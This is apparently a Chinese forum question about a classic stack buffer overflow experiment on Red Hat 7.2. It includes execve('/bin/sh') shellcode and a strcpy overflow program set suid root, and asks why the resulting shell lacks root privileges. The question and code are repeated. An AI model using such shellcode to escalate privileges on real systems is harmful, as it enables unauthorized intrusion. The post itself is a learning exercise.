23,115
社区成员
发帖
与我相关
我的任务
分享buffer overflow问题求解
RH7.2的机器,安装好以后,重新用安装光盘启动,使用upgrade模式按alt-f2进入root的shell, 将事先写好的一个缓存溢出程序用gcc编译好并chmod 成suid的程序. 这样一来这个编译好的程序就属于root并且被suid了,程序见下;
重新启动机器用普通用户user1登陆,执行这个程序,由于缓存溢出导致执行了/bin/sh,进入一个shell,但是为什么这个shell依旧是user1的shell? 没有root权限?
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
重新启动机器用普通用户user1登陆,执行这个程序,由于缓存溢出导致执行了/bin/sh,进入一个shell,但是为什么这个shell依旧是user1的shell? 没有root权限?
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
...全文
请发表友善的回复…
发表回复
